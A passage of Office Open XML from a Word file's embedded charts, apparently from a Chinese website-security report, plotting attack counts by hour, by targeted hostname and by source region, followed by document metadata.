                <c:pt idx="16">
                  <c:v>16时</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>17时</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>18时</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>19时</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>20时</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>21时</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>22时</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>23时</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>71</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>45</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>58</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>256</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>42</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>73</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>96</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="975809792"/>
        <c:axId val="975804896"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="975809792"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="15000"/>
                <a:lumOff val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr anchor="ctr" anchorCtr="1" rot="-4800000" spcFirstLastPara="1" vertOverflow="ellipsis" wrap="square"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" strike="noStrike" sz="900" u="none">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="975804896"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="975804896"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln algn="ctr" cap="flat" cmpd="sng"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anchor="ctr" anchorCtr="1" rot="-60000000" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" strike="noStrike" sz="900" u="none">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="975809792"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:schemeClr val="bg1"/>
    </a:solidFill>
    <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
      <a:solidFill>
        <a:schemeClr val="tx1">
          <a:lumMod val="15000"/>
          <a:lumOff val="85000"/>
        </a:schemeClr>
      </a:solidFill>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN"/>
      </a:pPr>
      <a:endParaRPr lang="zh-CN"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
  <c:printSettings>
    <c:headerFooter/>
    <c:pageMargins b="0.75" footer="0.3" header="0.3" l="0.7" r="0.7" t="0.75"/>
    <c:pageSetup/>
  </c:printSettings>
</c:chartSpace>
</file>

<file path=word/charts/chart1641010223713.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart"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p>
            <a:r>
              <a:t>业务系统遭受攻击分布</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" spc="0" strike="noStrike" sz="1400" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin charset="-122" panose="02010600030101010101" pitchFamily="2" typeface="宋体"/>
              <a:ea charset="-122" panose="02010600030101010101" pitchFamily="2" typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="zh-CN"/>
        </a:p>
      </c:txPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:ln w="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="0.00%" sourceLinked="0"/>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:dLblPos val="bestFit"/>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:separator>, </c:separator>
            <c:showLeaderLines val="1"/>
            <c:extLst>
              <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                <c15:spPr>
                  <a:prstGeom prst="wedgeRectCallout">
                    <a:avLst/>
                  </a:prstGeom>
                </c15:spPr>
                <c15:layout/>
              </c:ext>
            </c:extLst>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$3</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>www.dingxinsec.com.cn</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>www.dingxinsec.com.cn:443</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$3</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>899</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>47</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ayout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" strike="noStrike" sz="900" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="zh-CN"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="zero"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:schemeClr val="bg1"/>
    </a:solidFill>
    <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
      <a:solidFill>
        <a:schemeClr val="tx1">
          <a:lumMod val="15000"/>
          <a:lumOff val="85000"/>
        </a:schemeClr>
      </a:solidFill>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr/>
      </a:pPr>
      <a:endParaRPr lang="zh-CN"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
  <c:printSettings>
    <c:headerFooter/>
    <c:pageMargins b="0.75000000000000011" footer="0.30000000000000004" header="0.30000000000000004" l="0.70000000000000007" r="0.70000000000000007" t="0.75000000000000011"/>
    <c:pageSetup/>
  </c:printSettings>
</c:chartSpace>
</file>

<file path=word/charts/chart1641010223725.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart"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p>
            <a:r>
              <a:t>攻击区域分布情况</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" spc="0" strike="noStrike" sz="1400" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin charset="-122" panose="02010600030101010101" pitchFamily="2" typeface="宋体"/>
              <a:ea charset="-122" panose="02010600030101010101" pitchFamily="2" typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="zh-CN"/>
        </a:p>
      </c:txPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:ln w="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="0.00%" sourceLinked="0"/>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:dLblPos val="bestFit"/>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:separator>, </c:separator>
            <c:showLeaderLines val="1"/>
            <c:extLst>
              <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                <c15:spPr>
                  <a:prstGeom prst="wedgeRectCallout">
                    <a:avLst/>
                  </a:prstGeom>
                </c15:spPr>
                <c15:layout/>
              </c:ext>
            </c:extLst>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$12</c:f>
              <c:strCache>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>北京</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>亚太地区</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>广东</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>美国</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>香港</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>立陶宛</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>河南</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>江苏</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>罗马尼亚</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>宁夏</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>其他</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>231</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>122</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>73</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>58</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>262</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ayout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" strike="noStrike" sz="900" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="zh-CN"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="zero"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:schemeClr val="bg1"/>
    </a:solidFill>
    <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
      <a:solidFill>
        <a:schemeClr val="tx1">
          <a:lumMod val="15000"/>
          <a:lumOff val="85000"/>
        </a:schemeClr>
      </a:solidFill>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr/>
      </a:pPr>
      <a:endParaRPr lang="zh-CN"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
  <c:printSettings>
    <c:headerFooter/>
    <c:pageMargins b="0.75000000000000011" footer="0.30000000000000004" header="0.30000000000000004" l="0.70000000000000007" r="0.70000000000000007" t="0.75000000000000011"/>
    <c:pageSetup/>
  </c:printSettings>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68C4B-1A18-49E8-BDCE-7F335D08E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4</Pages>
  <Words>353</Words>
  <Characters>2017</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2366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2018-07-10T08:08:00Z</dcterms:created>
  <cp:lastModifiedBy>Windows 用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-28T11:54:00Z</dcterms:modified>
  <cp:revision>133</cp:revision>
</cp:coreProperties>
</file>